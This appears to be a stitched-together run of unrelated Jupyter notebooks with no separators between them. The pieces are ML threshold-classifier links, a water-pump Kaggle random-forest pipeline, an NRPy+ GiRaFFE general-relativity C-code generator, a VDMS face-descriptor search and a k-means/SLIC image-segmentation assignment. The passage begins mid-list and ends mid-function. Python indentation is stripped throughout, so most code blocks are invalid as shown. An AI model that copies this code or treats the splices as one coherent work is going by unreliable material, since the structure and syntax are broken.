- [Attacking discrimination with smarter machine learning](https://research.google.com/bigpicture/attacking-discrimination-in-ml/), by Google Research, with interactive visualizations. _"A threshold classifier essentially makes a yes/no decision, putting things in one category or another. We look at how these classifiers work, ways they can potentially be unfair, and how you might turn an unfair classifier into a fairer one. As an illustrative example, we focus on loan granting scenarios where a bank may grant or deny a loan based on a single, automatically computed number such as a credit score."_
- [Notebook about how to calculate expected value from a confusion matrix by treating it as a cost-benefit matrix](https://github.com/podopie/DAT18NYC/blob/master/classes/13-expected_value_cost_benefit_analysis.ipynb)
- [Visualizing Machine Learning Thresholds to Make Better Business Decisions](https://blog.insightdatascience.com/visualizing-machine-learning-thresholds-to-make-better-business-decisions-4ab07f823415)
### Doing
- [ ] Share visualizations in our Slack channel!
- [ ] RandomizedSearchCV / GridSearchCV, for model selection. (See module 3 assignment notebook)
- [ ] Stacking Ensemble. (See module 3 assignment notebook)
- [ ] More Categorical Encoding. (See module 2 assignment notebook)
```
%%capture
import sys
# If you're on Colab:
if 'google.colab' in sys.modules:
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'
!pip install category_encoders==2.*
# If you're working locally:
else:
DATA_PATH = '../data/'
import pandas as pd
import geopandas as gpd
import numpy as np
import matplotlib.pyplot as plt
# Merge train_features.csv & train_labels.csv
train = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'),
pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))
# Read test_features.csv & sample_submission.csv
test = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')
sample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')
train_wards = pd.read_csv("/home/alex/data/tanzania-pumps-rasterstats/train_wards.csv")
test_wards = pd.read_csv("/home/alex/data/tanzania-pumps-rasterstats/test_wards.csv")
train_elev = pd.read_csv("/home/alex/data/tanzania-pumps-rasterstats/train_srtm_elevation.csv")
test_elev = pd.read_csv("/home/alex/data/tanzania-pumps-rasterstats/test_srtm_elevation.csv")
train_merged = train.merge(train_wards, on="id").merge(train_elev, on="id")
test_merged = test.merge(test_wards, on="id").merge(test_elev, on="id")
train_merged.columns
def clean_columns(df):
dataframe = df.copy()
dataframe.rename(columns={"longitude_x":"longitude","latitude_x":"latitude"}, inplace=True)
dataframe.drop(["Unnamed: 0_x","Unnamed: 0_y","latitude_y","longitude_y","gps_height"], axis=1, inplace=True)
return dataframe
train_clean = clean_columns(train_merged)
test_clean = clean_columns(test_merged)
from sklearn.model_selection import train_test_split
train_clean, validate_clean = train_test_split(
train_clean,
train_size=0.80,
test_size=0.20,
    stratify=train_clean['status_group'],
random_state=42)
def wrangle(X):
"""Wrangle train, validate, and test sets in the same way"""
# Prevent SettingWithCopyWarning
X = X.copy()
# About 3% of the time, latitude has small values near zero,
# outside Tanzania, so we'll treat these values like zero.
X['latitude'] = X['latitude'].replace(-2e-08, 0)
# When columns have zeros and shouldn't, they are like null values.
# So we will replace the zeros with nulls, and impute missing values later.
# Also create a "missing indicator" column, because the fact that
# values are missing may be a predictive signal.
cols_with_zeros = ['longitude', 'latitude', 'construction_year',
'gps_height', 'population']
for col in cols_with_zeros:
X[col] = X[col].replace(0, np.nan)
X[col+'_MISSING'] = X[col].isnull()
# Drop duplicate columns
duplicates = ['quantity_group', 'payment_type']
X = X.drop(columns=duplicates)
# Drop recorded_by (never varies) and id (always varies, random)
unusable_variance = ['recorded_by', 'id']
X = X.drop(columns=unusable_variance)
# Convert date_recorded to datetime
X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)
# Extract components from date_recorded, then drop the original column
X['year_recorded'] = X['date_recorded'].dt.year
X['month_recorded'] = X['date_recorded'].dt.month
X['day_recorded'] = X['date_recorded'].dt.day
X = X.drop(columns='date_recorded')
# Engineer feature: how many years from construction_year to date_recorded
X['years'] = X['year_recorded'] - X['construction_year']
X['years_MISSING'] = X['years'].isnull()
# return the wrangled dataframe
return X
# The status_group column is the target
target = 'status_group'
# Get a dataframe with all train columns except the target
train_features = train_clean.drop(columns=[target])
# Get a list of the numeric features
numeric_features = train_features.select_dtypes(include='number').columns.tolist()
# Get a series with the cardinality of the nonnumeric features
cardinality = train_features.select_dtypes(exclude='number').nunique()
# Get a list of all categorical features
categorical_features = cardinality.index.tolist()
# Combine the lists
features = numeric_features + categorical_features
def reduce_cardinality_to_top_ten(feature, train, validate, test):
# Get a list of the top 10 entries in feature of interest
top10 = train[feature].value_counts()[:10].index
train = train.copy()
validate = validate.copy()
test = test.copy()
# At locations where the feature entry is NOT in the top 10,
# replace the entry with 'OTHER'
train.loc[~train[feature].isin(top10), feature] = 'OTHER'
validate.loc[~validate[feature].isin(top10), feature] = 'OTHER'
test.loc[~test[feature].isin(top10), feature] = 'OTHER'
return train, validate, test
categorical_features_with_more_than_ten_categories = []
for feature in categorical_features:
if len(train_clean[feature].unique()) > 10:
categorical_features_with_more_than_ten_categories.append(feature)
categorical_features_with_more_than_ten_categories
for feature in categorical_features_with_more_than_ten_categories:
train_clean, validate_clean, test_clean = reduce_cardinality_to_top_ten(feature, train_clean, validate_clean, test_clean)
X_train = train_clean[features]
X_validate = validate_clean[features]
X_test = test_clean[features]
y_train = train_clean[target]
y_validate = validate_clean[target]
import category_encoders as ce
from sklearn.ensemble import RandomForestClassifier
from sklearn.impute import SimpleImputer
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(),
RandomForestClassifier(random_state=8, max_depth=32, max_features= 0.668819157886731, min_samples_leaf=2, n_estimators=370, n_jobs=-1))
pipeline.fit(X_train, y_train)
print(pipeline.score(X_train, y_train))
print(pipeline.score(X_validate, y_validate))
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(),
RandomForestClassifier(random_state=8, min_samples_leaf=2, n_jobs=-1, n_estimators=370))
pipeline.fit(X_train, y_train)
print(pipeline.score(X_train, y_train))
print(pipeline.score(X_validate, y_validate))
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(),
RandomForestClassifier(random_state=8, min_samples_leaf=2, n_jobs=-1, n_estimators=370, max_depth=32)
)
pipeline.fit(X_train, y_train)
print(pipeline.score(X_train, y_train))
print(pipeline.score(X_validate, y_validate))
y_pred = pipeline.predict(X_test)
submission = sample_submission.copy()
submission['status_group'] = y_pred
submission
submission.to_csv('/home/alex/code/DS-Unit-2-Kaggle-Challenge/module4-classification-metrics/alex-pakalniskis-kaggle-submission-day-4.1.csv', index=False)
from sklearn.metrics import plot_confusion_matrix
plot_confusion_matrix(pipeline, X_validate, y_validate, values_format='.0f', xticks_rotation="vertical")
plt.show()
from sklearn.metrics import classification_report
y_pred = pipeline.predict(X_validate)
print(classification_report(y_validate, y_pred))
```
# `GiRaFFE_NRPy`: Source Terms
## Author: Patrick Nelson
<a id='intro'></a>
**Notebook Status:** <font color=green><b> Validated </b></font>
**Validation Notes:** This code produces the expected results for generated functions.
## This module presents the functionality of [GiRaFFE_NRPy_Source_Terms.py](../../edit/in_progress/GiRaFFE_NRPy/GiRaFFE_NRPy_Source_Terms.py).
## Introduction:
This notebook writes and documents the C code that `GiRaFFE_NRPy` uses to compute the source terms for the right-hand sides of the evolution equations in the unstaggered prescription.
The equations themselves are already coded up in other functions; however, the $\tilde{S}_i$ source term requires derivatives of the metric. It is most efficient and accurate to take these using the interpolated metric values that we will have calculated anyway, but doing so requires writing our derivatives in a nonstandard way within NRPy+, including hand-written code for memory access.
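As a concrete illustration of the workaround used below, the derivative of each four-metric component is taken as a one-sided finite difference between values at adjacent cell faces. A minimal Python sketch of that stencil (the function and variable names here are illustrative, not part of NRPy+):

```python
import numpy as np

def one_sided_deriv(g4_at_face_i, g4_at_face_ip1, dx):
    # Mirrors the generated C code: g4DDdD = (g4DD(i+1) - g4DD(i)) / dxx
    return (g4_at_face_ip1 - g4_at_face_i) / dx

# Sanity check on a linear function g(x) = 3x, whose derivative is exactly 3:
dx = 0.1
deriv = one_sided_deriv(3.0 * 0.0, 3.0 * dx, dx)
```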
<a id='toc'></a>
# Table of Contents
$$\label{toc}$$
This notebook is organized as follows:
1. [Step 1](#stilde_source): The $\tilde{S}_i$ source term
1. [Step 2](#code_validation): Code Validation against original C code
1. [Step 3](#latex_pdf_output): Output this notebook to $\LaTeX$-formatted PDF file
```
# Step 0: Add NRPy's directory to the path
# https://stackoverflow.com/questions/16780014/import-file-from-parent-directory
import os,sys
nrpy_dir_path = os.path.join("..")
if nrpy_dir_path not in sys.path:
sys.path.append(nrpy_dir_path)
import cmdline_helper as cmd
outdir = os.path.join("GiRaFFE_NRPy","GiRaFFE_Ccode_validation","RHSs")
cmd.mkdir(outdir)
```
<a id='stilde_source'></a>
# Step 1: The $\tilde{S}_i$ source term \[Back to [top](#toc)\]
$$\label{stilde_source}$$
We start in the usual way, importing the modules we need. We will also import the Levi-Civita symbol from `indexedexp.py` and use it to set the Levi-Civita tensor $\epsilon^{ijk} = [ijk]/\sqrt{\gamma}$.
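For reference, here is a small NumPy sketch (not NRPy+ code) of the relation $\epsilon^{ijk} = [ijk]/\sqrt{\gamma}$, where $[ijk]$ is the permutation symbol:

```python
import numpy as np

def levi_civita_symbol():
    # Permutation symbol [ijk]: +1 for even permutations of (0,1,2),
    # -1 for odd permutations, 0 if any index repeats.
    eps = np.zeros((3, 3, 3))
    for i, j, k in [(0, 1, 2), (1, 2, 0), (2, 0, 1)]:
        eps[i, j, k] = 1.0
    for i, j, k in [(0, 2, 1), (2, 1, 0), (1, 0, 2)]:
        eps[i, j, k] = -1.0
    return eps

def levi_civita_tensor_UUU(gammaDET):
    # epsilon^{ijk} = [ijk] / sqrt(gamma)
    return levi_civita_symbol() / np.sqrt(gammaDET)

eps_tensor = levi_civita_tensor_UUU(4.0)  # with gamma = 4, epsilon^{012} = 0.5
```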
```
# Step 1: The StildeD RHS *source* term
from outputC import outputC, outCfunction # NRPy+: Core C code output module
import indexedexp as ixp # NRPy+: Symbolic indexed expression (e.g., tensors, vectors, etc.) support
import GRHD.equations as GRHD # NRPy+: Generate general relativistic hydrodynamics equations
import GRFFE.equations as GRFFE # NRPy+: Generate general relativistic force-free electrodynamics equations
thismodule = "GiRaFFE_NRPy_Source_Terms"
def generate_memory_access_code(gammaDD,betaU,alpha):
# There are several pieces of C code that we will write ourselves because we need to do things
# a little bit outside of what NRPy+ is built for.
# First, we will write general memory access. We will read in values from memory at a given point
# for each quantity we care about.
global general_access
general_access = ""
for var in ["GAMMADD00", "GAMMADD01", "GAMMADD02",
"GAMMADD11", "GAMMADD12", "GAMMADD22",
"BETAU0", "BETAU1", "BETAU2","ALPHA",
"BU0","BU1","BU2",
"VALENCIAVU0","VALENCIAVU1","VALENCIAVU2"]:
lhsvar = var.lower().replace("dd","DD").replace("u","U").replace("bU","BU").replace("valencia","Valencia")
# e.g.,
# const REAL gammaDD00 = auxevol_gfs[IDX4S(GAMMADD00GF,i0,i1,i2)];
general_access += "const REAL "+lhsvar+" = auxevol_gfs[IDX4S("+var+"GF,i0,i1,i2)];\n"
# This quick function returns a nearby point for memory access. We need this because derivatives are not local operations.
def idxp1(dirn):
if dirn==0:
return "i0+1,i1,i2"
if dirn==1:
return "i0,i1+1,i2"
if dirn==2:
return "i0,i1,i2+1"
# Next we evaluate needed derivatives of the metric, based on their values at cell faces
global metric_deriv_access
metric_deriv_access = []
# for dirn in range(3):
# metric_deriv_access.append("")
# for var in ["GAMMA_FACEDDdD00", "GAMMA_FACEDDdD01", "GAMMA_FACEDDdD02",
# "GAMMA_FACEDDdD11", "GAMMA_FACEDDdD12", "GAMMA_FACEDDdD22",
# "BETA_FACEUdD0", "BETA_FACEUdD1", "BETA_FACEUdD2","ALPHA_FACEdD"]:
# lhsvar = var.lower().replace("dddd","DDdD").replace("udd","UdD").replace("dd","dD").replace("u","U").replace("_face","")
# rhsvar = var.replace("dD","")
# # e.g.,
# # const REAL gammaDDdD000 = (auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0+1,i1,i2)]-auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)])/dxx0;
# metric_deriv_access[dirn] += "const REAL "+lhsvar+str(dirn)+" = (auxevol_gfs[IDX4S("+rhsvar+"GF,"+idxp1(dirn)+")]-auxevol_gfs[IDX4S("+rhsvar+"GF,i0,i1,i2)])/dxx"+str(dirn)+";\n"
# metric_deriv_access[dirn] += "REAL Stilde_rhsD"+str(dirn)+";\n"
# For this workaround, instead of taking the derivative of the metric components and then building the
# four-metric, we build the four-metric and then take derivatives. Do this at i and i+1
for dirn in range(3):
metric_deriv_access.append("")
for var in ["GAMMA_FACEDD00", "GAMMA_FACEDD01", "GAMMA_FACEDD02",
"GAMMA_FACEDD11", "GAMMA_FACEDD12", "GAMMA_FACEDD22",
"BETA_FACEU0", "BETA_FACEU1", "BETA_FACEU2","ALPHA_FACE"]:
lhsvar = var.lower().replace("dd","DD").replace("u","U")
rhsvar = var
# e.g.,
# const REAL gammaDD00 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)];
metric_deriv_access[dirn] += "const REAL "+lhsvar+" = auxevol_gfs[IDX4S("+rhsvar+"GF,i0,i1,i2)];\n"
# Read in at the next grid point
for var in ["GAMMA_FACEDD00", "GAMMA_FACEDD01", "GAMMA_FACEDD02",
"GAMMA_FACEDD11", "GAMMA_FACEDD12", "GAMMA_FACEDD22",
"BETA_FACEU0", "BETA_FACEU1", "BETA_FACEU2","ALPHA_FACE"]:
lhsvar = var.lower().replace("dd","DD").replace("u","U").replace("_face","_facep1")
rhsvar = var
# e.g.,
# const REAL gammaDD00 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0+1,i1,i2)];
metric_deriv_access[dirn] += "const REAL "+lhsvar+" = auxevol_gfs[IDX4S("+rhsvar+"GF,"+idxp1(dirn)+")];\n"
metric_deriv_access[dirn] += "REAL Stilde_rhsD"+str(dirn)+";\n"
import BSSN.ADMBSSN_tofrom_4metric as AB4m
AB4m.g4DD_ito_BSSN_or_ADM("ADM",gammaDD,betaU,alpha)
four_metric_vars = [
AB4m.g4DD[0][0],
AB4m.g4DD[0][1],
AB4m.g4DD[0][2],
AB4m.g4DD[0][3],
AB4m.g4DD[1][1],
AB4m.g4DD[1][2],
AB4m.g4DD[1][3],
AB4m.g4DD[2][2],
AB4m.g4DD[2][3],
AB4m.g4DD[3][3]
]
four_metric_names = [
"g4DD00",
"g4DD01",
"g4DD02",
"g4DD03",
"g4DD11",
"g4DD12",
"g4DD13",
"g4DD22",
"g4DD23",
"g4DD33"
]
global four_metric_C, four_metric_Cp1
four_metric_C = outputC(four_metric_vars,four_metric_names,"returnstring",params="outCverbose=False,CSE_sorting=none")
for ii in range(len(four_metric_names)):
four_metric_names[ii] += "p1"
four_metric_Cp1 = outputC(four_metric_vars,four_metric_names,"returnstring",params="outCverbose=False,CSE_sorting=none")
four_metric_C = four_metric_C.replace("gamma","gamma_face").replace("beta","beta_face").replace("alpha","alpha_face").replace("{","").replace("}","").replace("g4","const REAL g4").replace("tmp_","tmp_deriv")
four_metric_Cp1 = four_metric_Cp1.replace("gamma","gamma_facep1").replace("beta","beta_facep1").replace("alpha","alpha_facep1").replace("{","").replace("}","").replace("g4","const REAL g4").replace("tmp_","tmp_derivp")
global four_metric_deriv
four_metric_deriv = []
for dirn in range(3):
four_metric_deriv.append("")
for var in ["g4DDdD00", "g4DDdD01", "g4DDdD02", "g4DDdD03", "g4DDdD11",
"g4DDdD12", "g4DDdD13", "g4DDdD22", "g4DDdD23", "g4DDdD33"]:
lhsvar = var + str(dirn+1)
rhsvar = var.replace("dD","")
rhsvarp1 = rhsvar + "p1"
# e.g.,
# const REAL g44DDdD000 = (g4DD00p1 - g4DD00)/dxx0;
four_metric_deriv[dirn] += "const REAL "+lhsvar+" = ("+rhsvarp1+" - "+rhsvar+")/dxx"+str(dirn)+";\n"
# This creates the C code that writes to the Stilde_rhs direction specified.
global write_final_quantity
write_final_quantity = []
for dirn in range(3):
write_final_quantity.append("")
write_final_quantity[dirn] += "rhs_gfs[IDX4S(STILDED"+str(dirn)+"GF,i0,i1,i2)] += Stilde_rhsD"+str(dirn)+";"
def write_out_functions_for_StildeD_source_term(outdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi):
generate_memory_access_code(gammaDD,betaU,alpha)
# First, we declare some dummy tensors that we will use for the codegen.
gammaDDdD = ixp.declarerank3("gammaDDdD","sym01",DIM=3)
betaUdD = ixp.declarerank2("betaUdD","nosym",DIM=3)
alphadD = ixp.declarerank1("alphadD",DIM=3)
g4DDdD = ixp.declarerank3("g4DDdD","sym01",DIM=4)
# We need to rerun a few of these functions with the reset lists to make sure these functions
# don't cheat by using analytic expressions
GRHD.compute_sqrtgammaDET(gammaDD)
GRHD.u4U_in_terms_of_ValenciavU__rescale_ValenciavU_by_applying_speed_limit(alpha, betaU, gammaDD, ValenciavU)
GRFFE.compute_smallb4U(gammaDD, betaU, alpha, GRHD.u4U_ito_ValenciavU, BU, sqrt4pi)
GRFFE.compute_smallbsquared(gammaDD, betaU, alpha, GRFFE.smallb4U)
GRFFE.compute_TEM4UU(gammaDD,betaU,alpha, GRFFE.smallb4U, GRFFE.smallbsquared,GRHD.u4U_ito_ValenciavU)
# GRHD.compute_g4DD_zerotimederiv_dD(gammaDD,betaU,alpha, gammaDDdD,betaUdD,alphadD)
GRHD.compute_S_tilde_source_termD(alpha, GRHD.sqrtgammaDET,g4DDdD, GRFFE.TEM4UU)
for i in range(3):
desc = "Adds the source term to StildeD"+str(i)+"."
name = "calculate_StildeD"+str(i)+"_source_term"
outCfunction(
outfile = os.path.join(outdir,name+".h"), desc=desc, name=name,
params ="const paramstruct *params,const REAL *auxevol_gfs, REAL *rhs_gfs",
body = general_access \
+metric_deriv_access[i]\
+four_metric_C\
+four_metric_Cp1\
+four_metric_deriv[i]\
+outputC(GRHD.S_tilde_source_termD[i],"Stilde_rhsD"+str(i),"returnstring",params=outCparams).replace("IDX4","IDX4S")\
+write_final_quantity[i],
loopopts ="InteriorPoints",
rel_path_to_Cparams=os.path.join("../"))
```
<a id='code_validation'></a>
# Step 2: Code Validation against original C code \[Back to [top](#toc)\]
$$\label{code_validation}$$
To validate the code in this tutorial we check for agreement between the files
1. that were written in this tutorial and
1. those that are stored in `GiRaFFE_NRPy/GiRaFFE_Ccode_library` or generated by `GiRaFFE_NRPy_Source_Terms.py`
```
import grid as gri             # NRPy+: Functions having to do with numerical grids
import NRPy_param_funcs as par # NRPy+: Parameter interface
# Declare gridfunctions necessary to generate the C code:
gammaDD = ixp.register_gridfunctions_for_single_rank2("AUXEVOL","gammaDD","sym01",DIM=3)
betaU = ixp.register_gridfunctions_for_single_rank1("AUXEVOL","betaU",DIM=3)
alpha = gri.register_gridfunctions("AUXEVOL","alpha",DIM=3)
BU = ixp.register_gridfunctions_for_single_rank1("AUXEVOL","BU",DIM=3)
ValenciavU = ixp.register_gridfunctions_for_single_rank1("AUXEVOL","ValenciavU",DIM=3)
StildeD = ixp.register_gridfunctions_for_single_rank1("EVOL","StildeD",DIM=3)
# Declare this symbol:
sqrt4pi = par.Cparameters("REAL",thismodule,"sqrt4pi","sqrt(4.0*M_PI)")
# First, we generate the file using the functions written in this notebook:
outCparams = "outCverbose=False"
write_out_functions_for_StildeD_source_term(outdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi)
# Define the directory that we wish to validate against:
valdir = os.path.join("GiRaFFE_NRPy","GiRaFFE_Ccode_library","RHSs")
cmd.mkdir(valdir)
import GiRaFFE_NRPy.GiRaFFE_NRPy_Source_Terms as source
source.write_out_functions_for_StildeD_source_term(valdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi)
import difflib
import sys
print("Printing difference between original C code and this code...")
# Open the files to compare
files = ["calculate_StildeD0_source_term.h","calculate_StildeD1_source_term.h","calculate_StildeD2_source_term.h"]
for file in files:
print("Checking file " + file)
with open(os.path.join(valdir,file)) as file1, open(os.path.join(outdir,file)) as file2:
# Read the lines of each file
file1_lines = file1.readlines()
file2_lines = file2.readlines()
num_diffs = 0
for line in difflib.unified_diff(file1_lines, file2_lines, fromfile=os.path.join(valdir,file), tofile=os.path.join(outdir,file)):
sys.stdout.writelines(line)
num_diffs = num_diffs + 1
if num_diffs == 0:
print("No difference. TEST PASSED!")
else:
print("ERROR: Disagreement found with .py file. See differences above.")
sys.exit(1)
```
<a id='latex_pdf_output'></a>
# Step 3: Output this notebook to $\LaTeX$-formatted PDF file \[Back to [top](#toc)\]
$$\label{latex_pdf_output}$$
The following code cell converts this Jupyter notebook into a proper, clickable $\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename
[Tutorial-GiRaFFE_NRPy_C_code_library-Source_Terms](Tutorial-GiRaFFE_NRPy_C_code_library-Source_Terms.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means.)
```
import cmdline_helper as cmd # NRPy+: Multi-platform Python command-line interface
cmd.output_Jupyter_notebook_to_LaTeXed_PDF("Tutorial-GiRaFFE_NRPy-Source_Terms",location_of_template_file=os.path.join(".."))
```
# Find Descriptors (Matching)
Similar to classification, VDMS supports feature-vector search based on similarity matching as part of its API.
In this example, where we have a pre-loaded set of feature vectors with associated labels,
we can search for similar feature vectors and query information related to them.
We will start by taking a new image that VDMS has not seen before,
find the faces in it, run feature-vector extraction, and find images related to it:
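Conceptually, the similarity search VDMS performs is a k-nearest-neighbor lookup over stored descriptors. A minimal brute-force sketch of that idea (illustrative only; VDMS does this server-side via `FindDescriptor`):

```python
import numpy as np

def k_nearest(stored_descriptors, query_descriptor, k=4):
    # Compute the L2 distance from the query to every stored descriptor,
    # then return the indices and distances of the k closest ones.
    dists = np.linalg.norm(stored_descriptors - query_descriptor, axis=1)
    order = np.argsort(dists)[:k]
    return order, dists[order]

stored = np.array([[0.0, 0.0], [1.0, 0.0], [5.0, 5.0], [0.9, 0.1]])
idx, dist = k_nearest(stored, np.array([1.0, 0.0]), k=2)
# rows 1 and 3 are the two nearest descriptors
```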
```
import getDescriptors as g
imagePath = "images/1.jpg"
descriptors = g.get_descriptors(imagePath)
```
Now that we have the new faces and their feature vectors, we can ask VDMS to return similar descriptors.
But first, let's connect to VDMS:
```
import vdms
db = vdms.vdms()
db.connect("localhost")
```
We can now search for similar descriptors by passing the descriptor of the face to VDMS as follows:
```
import numpy as np
import json
import util
who_is_this = descriptors[1] # Number 1 is Tom's face
blob_array = []
query = """
[
{
"FindDescriptor" : {
"set": "hike_mt_rainier",
"_ref": 33,
"k_neighbors": 4,
"results": {
"list": ["_distance", "_id", "_label"]
}
}
}
]
"""
blob_array.append(who_is_this)
response, images = db.query(query, [blob_array])
print (db.get_last_response_str())
```
Now that we can see these similar descriptors, let's go one step further and retrieve the images associated with them:
```
blob_array = []
query = """
[
{
"FindDescriptor" : {
"set": "hike_mt_rainier",
"_ref": 33,
"k_neighbors": 5,
"results": {
"list": ["_distance", "_id"]
}
}
},
{
"FindImage" : {
"link": { "ref": 33 },
"operations": [
{
"type": "resize",
"height": 200,
"width": 200
}
],
"results": {
"list": ["name_file"]
}
}
}
]
"""
blob_array.append(who_is_this)
response, images = db.query(query, [blob_array])
util.display_images(images)
print ("Number of images:", len(images))
%%javascript
IPython.OutputArea.prototype._should_scroll = function(lines) {
return false;
}
import vdms
import numpy as np
import json
db = vdms.vdms()
db.connect("localhost")
who_is_this = descriptors[1]
blob_array = []
query = """
[
{
"FindDescriptor" : {
"set": "hike_mt_rainier",
"_ref": 33,
"k_neighbors": 1,
"results": {
"list": ["_distance", "_id"]
}
}
},
{
"FindEntity" : {
"class": "Person",
"link": { "ref": 33 },
"_ref": 34,
"results": {
"list": ["name", "lastname"]
}
}
},
{
"FindImage" : {
"link": { "ref": 34 },
"operations": [
{
"type": "resize",
"height": 300,
"width": 300
}
],
"results": {
"list": ["name_file"]
}
}
}
]
"""
blob_array.append(who_is_this)
response, images = db.query(query, [blob_array])
util.display_images(images)
print ("Number of images:", len(images))
```
<a href="https://colab.research.google.com/github/Vinit-source/CSL7382-Medical-image-clustering-assignment.py/blob/main/problem_code.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Problem
Implement the **k-means**, **SLIC**, and **Ratio Cut** algorithms for segmenting a given bioimage into multiple segments. Use the attached image or any other bioimage to show the segmentation results of your algorithms.
Utility Functions
```
def visualize_clusters(image, labels, n_clusters, subp):
# convert to the shape of a vector of pixel values
masked_image = np.copy(image)
masked_image = masked_image.reshape((-1, 3))
labels = labels.flatten()
for i in range(n_clusters):
# color (i.e cluster) to disable
cluster = i
masked_image[labels == cluster] = [255-150*i, 255-60*i, 155+3*i]
# convert back to original shape
masked_image = masked_image.reshape(image.shape)
# show the image
plt.subplot(subp).imshow(masked_image)
plt.axis('off')
def plot_segmented_image( img, labels, num_clusters, subp):
labels = labels.reshape( img.shape[:2] )
plt.subplot(subp).imshow(img)
plt.axis('off')
for l in range( num_clusters ):
try:
plt.subplot(subp).contour( labels == l, levels=1, colors=[plt.get_cmap('coolwarm')( l / float( num_clusters ))] )
except ValueError: #raised if `y` is empty.
pass
```
# K-Means
```
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
class KMeansClustering:
def runKMeans(self, intensities: np.ndarray, n_clusters: int, n_iterations: int = 20) -> (list, np.array):
'''
The KMeans clustering algorithm.
Returns:
cluster_labels: list of labels for each point.
'''
self.n_clusters = n_clusters
self.init_centroids(intensities)
print('Running KMeans...')
for i in range(n_iterations):
cluster_int, cluster_ind = self.allocate(X, intensities)  # X is the global pixel-coordinate array from __main__; allocate only uses intensities
self.update_centroids(cluster_int)
labels = np.empty((intensities.shape[0]))
for i in range(n_clusters):
labels[cluster_ind[i]] = i
return labels, self.centroids
def init_centroids(self, intensities: np.ndarray):
'''
Initialize centroids with random examples (or points) from the dataset.
'''
#Number of examples
l = intensities.shape[0]
#Initialize centroids array with points from intensities with random indices chosen from 0 to number of examples
rng = np.random.default_rng()
self.centroids = intensities[rng.choice(l, size=self.n_clusters, replace=False)]
self.centroids.astype(np.float32)
def allocate(self, X: np.ndarray, intensities):
'''
This function forms new clusters from the centroids updated in the previous iterations.
'''
#Step 1: Allocate the closest points to the clusters to fill them with at least one point.
# Allocate the remaining points to the closest clusters
#Calculate the differences in the features between centroids and X using broadcast subtract
res = self.centroids - intensities[:, np.newaxis]
#Find Manhattan distances of each point with all centroids
dist = np.absolute(res)
#Find the closest centroid from each point.
# Find unique indices of the closest points. Using res again for optimization
#not unique indices
res = np.where(dist == dist.min(axis=1)[:, np.newaxis])
#res[0] is used as indices for row-wise indices in res[1]
min_indices = res[1][np.unique(res[0])]
indices = [[] for i in range(self.n_clusters)]
for i, c in enumerate(min_indices):
if not c == -1:
# cluster_array[c] = np.append(cluster_array[c], [X[i]], axis=0) #add the point to the corresponding cluster
indices[c].append(i)
return [intensities[indices[i]] for i in range(self.n_clusters)], indices
def update_centroids(self, cluster_int):
'''
This function updates the centroids based on the updated clusters.
'''
#Make a rough copy
centroids = self.centroids
#Find mean for every cluster
for i in range(self.n_clusters):
if len(cluster_int[i]) > 0:
centroids[i] = np.mean(cluster_int[i])
#Update fair copy
self.centroids = centroids
if __name__ == '__main__':
img = Image.open('f1.png')
plt.figure(figsize=(10,20))
plt.subplot(121).imshow(img)
plt.axis('off')
img = np.array(img)
print(f'img.shape: {img.shape}')
X = []
intensities = []
for i in range(img.shape[0]):
for j in range(img.shape[1]):
X.append([i, j])
intensities.append(np.average(img[i][j]))
X = np.array(X)
intensities = np.array(intensities)
k = 3
KMC = KMeansClustering()
labels, centroids = KMC.runKMeans(intensities, k, 10)
visualize_clusters(img, labels, k, 122)
plt.show()
```
# SLIC
```
import numpy as np
from numpy import linalg as la
from PIL import Image
import sys
import matplotlib.pyplot as plt
from time import perf_counter
class SLIC:
def runSlic(self, X: np.ndarray, intensities: np.ndarray, n_clusters: int, n_iterations: int, lmbda: float) -> list:
'''
The SLIC clustering algorithm.
Returns:
cluster_labels: list of labels for each point.
'''
self.n_clusters = n_clusters
self.init_centroids(X, intensities)
for i in range(n_iterations):
cluster_int, cluster_loc, indices = self.allocate(X, intensities, lmbda)
self.update_centroids(cluster_int, cluster_loc)
labels = np.empty((X.shape[0]))
for i in range(n_clusters):
labels[indices[i]] = i
return labels
def init_centroids(self, X, intensities: np.ndarray):
'''
Initialize centroids with random examples (or points) from the dataset.
'''
#Number of examples
l = intensities.shape[0]
#Initialize centroids array with points from intensities with random indices chosen from 0 to number of examples
rng = np.random.default_rng()
indices = rng.choice(l, size=self.n_clusters, replace=False)
self.centroids_c = X[indices]
self.centroids_i = intensities[indices]
self.centroids_i.astype(np.float32)
def allocate(self, X: np.ndarray, intensities, lmbda):
'''
This function forms new clusters from the centroids updated in the previous iterations.
'''
# Allocate the points to the closest clusters
#Calculate the differences in the features between centroids and X using broadcast subtract
dist = np.absolute(self.centroids_i - intensities[:, np.newaxis]) + lmbda * la.norm(self.centroids_c - X[:, np.newaxis], axis=2)
#Find the closest centroid from each point.
# Find unique indices of the closest points. Using res again for optimization
#not unique indices
res = np.where(dist == dist.min(axis=1)[:, np.newaxis])
#res[0] is used as indices for row-wise indices in res[1]
min_indices = res[1][np.unique(res[0])]
indices = [[] for i in range(self.n_clusters)]
for i, c in enumerate(min_indices):
if not c == -1:
indices[c].append(i)
return [intensities[indices[i]] for i in range(self.n_clusters)], \
[X[indices[i]] for i in range(self.n_clusters)], indices
def update_centroids(self, cluster_int, cluster_loc):
'''
This function updates the centroids based on the updated clusters.
